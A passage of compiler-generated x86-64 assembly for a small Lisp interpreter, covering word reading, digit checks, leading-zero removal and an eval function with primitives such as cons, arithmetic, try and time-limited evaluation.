in Loop: Header=BB14_3 Depth=2 movq -8(%rbp), %rax movl %eax, %edi callq _putchar movq -8(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -32(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -32(%rbp) ## %bb.6: ## in Loop: Header=BB14_3 Depth=2 cmpq $10, -8(%rbp) jne LBB14_3 ## %bb.7: ## in Loop: Header=BB14_1 Depth=1 movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -40(%rbp) movq %rax, _in_word2.buffer(%rip) movq $0, -16(%rbp) LBB14_8: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpq $0, -24(%rbp) je LBB14_28 ## %bb.9: ## in Loop: Header=BB14_8 Depth=2 movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) cmpq $32, -8(%rbp) je LBB14_17 ## %bb.10: ## in Loop: Header=BB14_8 Depth=2 cmpq $10, -8(%rbp) je LBB14_17 ## %bb.11: ## in Loop: Header=BB14_8 Depth=2 cmpq $40, -8(%rbp) je LBB14_17 ## %bb.12: ## in Loop: Header=BB14_8 Depth=2 cmpq $41, -8(%rbp) je LBB14_17 ## %bb.13: ## in Loop: Header=BB14_8 Depth=2 cmpq $91, -8(%rbp) je LBB14_17 ## %bb.14: ## in Loop: Header=BB14_8 Depth=2 cmpq $93, -8(%rbp) je LBB14_17 ## %bb.15: ## in Loop: Header=BB14_8 Depth=2 cmpq $39, -8(%rbp) je LBB14_17 ## %bb.16: ## in Loop: Header=BB14_8 Depth=2 cmpq $34, -8(%rbp) jne LBB14_23 LBB14_17: ## in Loop: Header=BB14_8 Depth=2 cmpq $0, -16(%rbp) je LBB14_19 ## %bb.18: ## in Loop: Header=BB14_8 Depth=2 movq -16(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -40(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -40(%rbp) LBB14_19: ## in Loop: Header=BB14_8 Depth=2 movq $0, -16(%rbp) cmpq $32, -8(%rbp) je LBB14_22 ## %bb.20: ## in Loop: Header=BB14_8 Depth=2 cmpq $10, -8(%rbp) je LBB14_22 ## %bb.21: ## in Loop: Header=BB14_8 Depth=2 movq -8(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -40(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -40(%rbp) LBB14_22: ## in Loop: Header=BB14_8 Depth=2 jmp LBB14_27 LBB14_23: ## in Loop: Header=BB14_8 Depth=2 movl $32, %eax cmpq -8(%rbp), %rax jge LBB14_26 ## %bb.24: ## in Loop: Header=BB14_8 Depth=2 cmpq $127, -8(%rbp) jge LBB14_26 ## %bb.25: ## in Loop: Header=BB14_8 Depth=2 movq -8(%rbp), %rdi movq -16(%rbp), %rsi callq _cons movq %rax, -16(%rbp) LBB14_26: ## in Loop: Header=BB14_8 Depth=2 jmp LBB14_27 LBB14_27: ## in Loop: Header=BB14_8 Depth=2 jmp LBB14_8 LBB14_28: ## in Loop: Header=BB14_1 Depth=1 movq _in_word2.buffer(%rip), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, _in_word2.buffer(%rip) jmp LBB14_1 LBB14_29: movq _in_word2.buffer(%rip), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq _in_word2.buffer(%rip), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, _in_word2.buffer(%rip) movq -16(%rbp), %rdi callq _only_digits cmpq $0, %rax je LBB14_31 ## %bb.30: movq -16(%rbp), %rdi callq _remove_leading_zeros movq %rax, %rdi callq _mk_numb movq %rax, -16(%rbp) jmp LBB14_32 LBB14_31: movq -16(%rbp), %rdi callq _lookup_word movq %rax, -16(%rbp) LBB14_32: movq -16(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _only_digits ## -- Begin function only_digits .p2align 4, 0x90 _only_digits: ## @only_digits .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) LBB15_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -16(%rbp) je LBB15_6 ## %bb.2: ## in Loop: Header=BB15_1 Depth=1 movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) cmpq $48, -24(%rbp) jl LBB15_4 ## %bb.3: ## in Loop: Header=BB15_1 Depth=1 cmpq $57, -24(%rbp) jle LBB15_5 LBB15_4: movq $0, -8(%rbp) jmp LBB15_7 LBB15_5: ## in Loop: Header=BB15_1 Depth=1 movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) jmp LBB15_1 LBB15_6: movq $1, -8(%rbp) LBB15_7: movq -8(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _remove_leading_zeros ## -- Begin function remove_leading_zeros .p2align 4, 0x90 _remove_leading_zeros: ## @remove_leading_zeros .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) cmpq $0, -16(%rbp) jne LBB16_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB16_6 LBB16_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _remove_leading_zeros movq %rax, -24(%rbp) cmpq $0, -24(%rbp) jne LBB16_5 ## %bb.3: cmpq $48, -32(%rbp) jne LBB16_5 ## %bb.4: movq $0, -8(%rbp) jmp LBB16_6 LBB16_5: movq -32(%rbp), %rdi movq -24(%rbp), %rsi callq _cons movq %rax, -8(%rbp) LBB16_6: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _in_word ## -- Begin function in_word .p2align 4, 0x90 _in_word: ## @in_word .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp LBB17_1: ## =>This Loop Header: Depth=1 ## Child Loop BB17_4 Depth 2 callq _in_word2 movq %rax, -8(%rbp) movq -8(%rbp), %rax movq _left_bracket@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB17_3 ## %bb.2: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq LBB17_3: ## in Loop: Header=BB17_1 Depth=1 jmp LBB17_4 LBB17_4: ## Parent Loop BB17_1 Depth=1 ## => This Inner Loop Header: Depth=2 callq _in_word movq _right_bracket@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB17_6 ## %bb.5: ## in Loop: Header=BB17_4 Depth=2 jmp LBB17_4 LBB17_6: ## in Loop: Header=BB17_1 Depth=1 jmp LBB17_1 .cfi_endproc ## -- End function .globl _eval ## -- Begin function eval .p2align 4, 0x90 _eval: ## @eval .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $320, %rsp ## imm = 0x140 movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB18_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_2: movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB18_4 ## %bb.3: movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_4: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -32(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) cmpq $0, -32(%rbp) jge LBB18_6 ## %bb.5: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_6: movq -32(%rbp), %rax movq _wrd_quote@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB18_8 ## %bb.7: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_8: movq -32(%rbp), %rax movq _wrd_if@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB18_14 ## %bb.9: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -40(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) cmpq $0, -40(%rbp) jge LBB18_11 ## %bb.10: movq -40(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_11: movq -40(%rbp), %rax movq _wrd_false@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB18_13 ## %bb.12: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) LBB18_13: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -8(%rbp) jmp LBB18_95 LBB18_14: movq -16(%rbp), %rdi movq -24(%rbp), %rsi callq _evalst movq %rax, -48(%rbp) cmpq $0, -48(%rbp) jge LBB18_16 ## %bb.15: movq -48(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_16: movq -48(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq %rcx, -56(%rbp) movq -48(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq (%rcx,%rdx,8), %rdx movq (%rax,%rdx,8), %rdx movq %rdx, -64(%rbp) movq -48(%rbp), %rdx movq (%rcx,%rdx,8), %rdx movq (%rcx,%rdx,8), %rcx movq (%rax,%rcx,8), %rax movq %rax, -72(%rbp) movq -32(%rbp), %rcx movq _pf_numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax decl %eax movl %eax, %ecx movq %rcx, -144(%rbp) ## 8-byte Spill subl $22, %eax ja LBB18_70 ## %bb.96: movq -144(%rbp), %rax ## 8-byte Reload leaq LJTI18_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB18_17: movq -56(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_18: movq -56(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_19: movq -56(%rbp), %rdi movq -64(%rbp), %rsi callq _cons movq %rax, -8(%rbp) jmp LBB18_95 LBB18_20: movq -56(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB18_22 ## %bb.21: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -152(%rbp) ## 8-byte Spill jmp LBB18_23 LBB18_22: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -152(%rbp) ## 8-byte Spill LBB18_23: movq -152(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_24: movq -56(%rbp), %rdi movq -64(%rbp), %rsi callq _eq cmpq $0, %rax je LBB18_26 ## %bb.25: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -160(%rbp) ## 8-byte Spill jmp LBB18_27 LBB18_26: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -160(%rbp) ## 8-byte Spill LBB18_27: movq -160(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_28: movq _display_enabled@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) je LBB18_30 ## %bb.29: movq -56(%rbp), %rsi leaq L_.str.26(%rip), %rdi callq _out movq %rax, -8(%rbp) jmp LBB18_95 LBB18_30: movq _captured_displays@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -104(%rbp) movq -104(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -112(%rbp) movq -56(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, -120(%rbp) movq -120(%rbp), %rdx movq -112(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -120(%rbp), %rdx movq -104(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -56(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_31: movq -56(%rbp), %rsi leaq L_.str.27(%rip), %rdi callq _out movq %rax, -8(%rbp) jmp LBB18_95 LBB18_32: movq -56(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB18_34 ## %bb.33: xorl %eax, %eax ## kill: def $rax killed $eax movq %rax, -168(%rbp) ## 8-byte Spill jmp LBB18_35 LBB18_34: movq -56(%rbp), %rax movq %rax, -168(%rbp) ## 8-byte Spill LBB18_35: movq -168(%rbp), %rax ## 8-byte Reload movq %rax, -176(%rbp) ## 8-byte Spill movq -64(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB18_37 ## %bb.36: xorl %eax, %eax ## kill: def $rax killed $eax movq %rax, -184(%rbp) ## 8-byte Spill jmp LBB18_38 LBB18_37: movq -64(%rbp), %rax movq %rax, -184(%rbp) ## 8-byte Spill LBB18_38: movq -176(%rbp), %rdi ## 8-byte Reload movq -184(%rbp), %rsi ## 8-byte Reload callq _append movq %rax, -8(%rbp) jmp LBB18_95 LBB18_39: movq -56(%rbp), %rdi callq _length movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_40: movq -56(%rbp), %rdi callq _nmb movq %rax, -192(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -192(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _compare cmpq $60, %rax jne LBB18_42 ## %bb.41: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -200(%rbp) ## 8-byte Spill jmp LBB18_43 LBB18_42: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -200(%rbp) ## 8-byte Spill LBB18_43: movq -200(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_44: movq -56(%rbp), %rdi callq _nmb movq %rax, -208(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -208(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _compare cmpq $62, %rax jne LBB18_46 ## %bb.45: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -216(%rbp) ## 8-byte Spill jmp LBB18_47 LBB18_46: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -216(%rbp) ## 8-byte Spill LBB18_47: movq -216(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_48: movq -56(%rbp), %rdi callq _nmb movq %rax, -224(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -224(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _compare cmpq $62, %rax je LBB18_50 ## %bb.49: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -232(%rbp) ## 8-byte Spill jmp LBB18_51 LBB18_50: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -232(%rbp) ## 8-byte Spill LBB18_51: movq -232(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_52: movq -56(%rbp), %rdi callq _nmb movq %rax, -240(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -240(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _compare cmpq $60, %rax je LBB18_54 ## %bb.53: movq _wrd_true@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -248(%rbp) ## 8-byte Spill jmp LBB18_55 LBB18_54: movq _wrd_false@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -248(%rbp) ## 8-byte Spill LBB18_55: movq -248(%rbp), %rax ## 8-byte Reload movq %rax, -8(%rbp) jmp LBB18_95 LBB18_56: movq -56(%rbp), %rdi callq _nmb movq %rax, -256(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -256(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi xorl %eax, %eax movl %eax, %edx callq _addition movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_57: movq -56(%rbp), %rdi callq _nmb movq %rax, -264(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -264(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _multiplication movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_58: movq -56(%rbp), %rdi callq _nmb movq %rax, -272(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -272(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _exponentiation movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_59: movq -56(%rbp), %rdi callq _nmb movq %rax, -280(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -280(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _compare cmpq $62, %rax je LBB18_61 ## %bb.60: xorl %eax, %eax movl %eax, %edi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_61: movq -56(%rbp), %rdi callq _nmb movq %rax, -288(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi callq _nmb movq -288(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi xorl %eax, %eax movl %eax, %edx callq _subtraction movq %rax, %rdi callq _remove_leading_zeros movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_62: movq -56(%rbp), %rdi callq _base2_to_10 movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_63: movq -56(%rbp), %rdi callq _nmb movq %rax, %rdi callq _base10_to_2 movq %rax, -8(%rbp) jmp LBB18_95 LBB18_64: movq -56(%rbp), %rdi callq _size movq %rax, %rdi callq _mk_numb movq %rax, -8(%rbp) jmp LBB18_95 LBB18_65: callq _read_bit movq %rax, -8(%rbp) jmp LBB18_95 LBB18_66: xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq _q@GOTPCREL(%rip), %rcx movq %rax, (%rcx) movq %rax, -40(%rbp) movq -56(%rbp), %rdi callq _write_lst movl $10, %edi callq _write_chr movq -40(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_67: callq _read_record movq %rax, -40(%rbp) cmpq $0, -40(%rbp) jge LBB18_69 ## %bb.68: movq -40(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_69: xorl %eax, %eax movl %eax, %edi callq _read_expr movq %rax, -8(%rbp) jmp LBB18_95 LBB18_70: movq -24(%rbp), %rax movq _wrd_no_time_limit@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB18_74 ## %bb.71: cmpq $0, -24(%rbp) jne LBB18_73 ## %bb.72: xorl %eax, %eax ## kill: def $rax killed $eax movq _wrd_out_of_time@GOTPCREL(%rip), %rcx subq (%rcx), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_73: movq -24(%rbp), %rdi callq _sub1 movq %rax, -24(%rbp) LBB18_74: movq -32(%rbp), %rax movq _wrd_eval@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB18_76 ## %bb.75: callq _clean_env movq -56(%rbp), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -40(%rbp) callq _restore_env movq -40(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_76: movq -32(%rbp), %rax movq _wrd_try@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB18_89 ## %bb.77: movq $0, -136(%rbp) movq -56(%rbp), %rax movq _wrd_no_time_limit@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB18_79 ## %bb.78: movq -56(%rbp), %rdi callq _nmb movq %rax, -56(%rbp) LBB18_79: movq -56(%rbp), %rax movq _wrd_no_time_limit@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB18_82 ## %bb.80: movq -24(%rbp), %rax movq _wrd_no_time_limit@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB18_83 ## %bb.81: movq -56(%rbp), %rdi movq -24(%rbp), %rsi callq _compare cmpq $60, %rax je LBB18_83 LBB18_82: movq $1, -136(%rbp) movq -24(%rbp), %rax movq %rax, -56(%rbp) LBB18_83: movq -72(%rbp), %rdi movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _cons movq %rax, %rcx movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _display_enabled@GOTPCREL(%rip), %rax movq (%rax), %rsi xorl %eax, %eax movl %eax, %edi callq _cons movq %rax, %rcx movq _display_enabled@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -128(%rbp) movq -128(%rbp), %rdx movq -128(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -128(%rbp), %rdi movq _captured_displays@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _cons movq %rax, %rcx movq _captured_displays@GOTPCREL(%rip), %rax movq %rcx, (%rax) callq _clean_env movq -64(%rbp), %rdi movq -56(%rbp), %rsi callq _eval movq %rax, -40(%rbp) callq _restore_env movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _display_enabled@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _display_enabled@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _captured_displays@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -128(%rbp) movq _captured_displays@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _captured_displays@GOTPCREL(%rip), %rax movq %rcx, (%rax) cmpq $0, -136(%rbp) je LBB18_86 ## %bb.84: movq -40(%rbp), %rax xorl %ecx, %ecx ## kill: def $rcx killed $ecx movq _wrd_out_of_time@GOTPCREL(%rip), %rdx subq (%rdx), %rcx cmpq %rcx, %rax jne LBB18_86 ## %bb.85: movq -40(%rbp), %rax movq %rax, -8(%rbp) jmp LBB18_95 LBB18_86: cmpq $0, -40(%rbp) jge LBB18_88 ## %bb.87: movq _wrd_failure@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -296(%rbp) ## 8-byte Spill xorl %eax, %eax ## kill: def $rax killed $eax subq -40(%rbp), %rax movq %rax, -304(%rbp) ## 8-byte Spill movq -128(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -304(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq -296(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB18_95 LBB18_88: movq _wrd_success@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -312(%rbp) ## 8-byte Spill movq -40(%rbp), %rax movq %rax, -320(%rbp) ## 8-byte Spill movq -128(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -320(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq -312(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB18_95 LBB18_89: movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -80(%rbp) movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -88(%rbp) movq -80(%rbp), %rdi movq -48(%rbp), %rsi callq _bind movq -88(%rbp), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -40(%rbp) LBB18_90: ## =>This Inner Loop Header: Depth=1 movq -80(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB18_91 jmp LBB18_94 LBB18_91: ## in Loop: Header=BB18_90 Depth=1 movq -80(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -96(%rbp) movq -96(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB18_93 ## %bb.92: ## in Loop: Header=BB18_90 Depth=1 movq -96(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdx movq -96(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) LBB18_93: ## in Loop: Header=BB18_90 Depth=1 movq -80(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -80(%rbp) jmp LBB18_90 LBB18_94: movq -40(%rbp), %rax movq %rax, -8(%rbp) LBB18_95: movq -8(%rbp), %rax addq $320, %rsp ## imm = 0x140 popq %rbp retq .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L18_0_set_17, LBB18_17-LJTI18_0 .set L18_0_set_18, LBB18_18-LJTI18_0 .set L18_0_set_19, LBB18_19-LJTI18_0 .set L18_0_set_20, LBB18_20-LJTI18_0 .set L18_0_set_24, LBB18_24-LJTI18_0 .set L18_0_set_28, LBB18_28-LJTI18_0 .set L18_0_set_31, LBB18_31-LJTI18_0 .set L18_0_set_32, LBB18_32-LJTI18_0 .set L18_0_set_39, LBB18_39-LJTI18_0 .set L18_0_set_40, LBB18_40-LJTI18_0 .set L18_0_set_44, LBB18_44-LJTI18_0 .set L18_0_set_48, LBB18_48-LJTI18_0 .set L18_0_set_52, LBB18_52-LJTI18_0 .set L18_0_set_56, LBB18_56-LJTI18_0 .set L18_0_set_57, LBB18_57-LJTI18_0 .set L18_0_set_58, LBB18_58-LJTI18_0 .set L18_0_set_59, LBB18_59-LJTI18_0 .set L18_0_set_62, LBB18_62-LJTI18_0 .set L18_0_set_63, LBB18_63-LJTI18_0 .set L18_0_set_64, LBB18_64-LJTI18_0 .set L18_0_set_65, LBB18_65-LJTI18_0 .set L18_0_set_66, LBB18_66-LJTI18_0 .set L18_0_set_67, LBB18_67-LJTI18_0 LJTI18_0: .long L18_0_set_17 .long L18_0_set_18 .long L18_0_set_19 .long L18_0_set_20 .long L18_0_set_24 .long L18_0_set_28 .long L18_0_set_31 .long L18_0_set_32 .long L18_0_set_39 .long L18_0_set_40 .long L18_0_set_44 .long L18_0_set_48 .long L18_0_set_52 .long L18_0_set_56 .long L18_0_set_57 .long L18_0_set_58 .long L18_0_set_59 .long L18_0_set_62 .long L18_0_set_63 .long L18_0_set_64 .long L18_0_set_65 .long 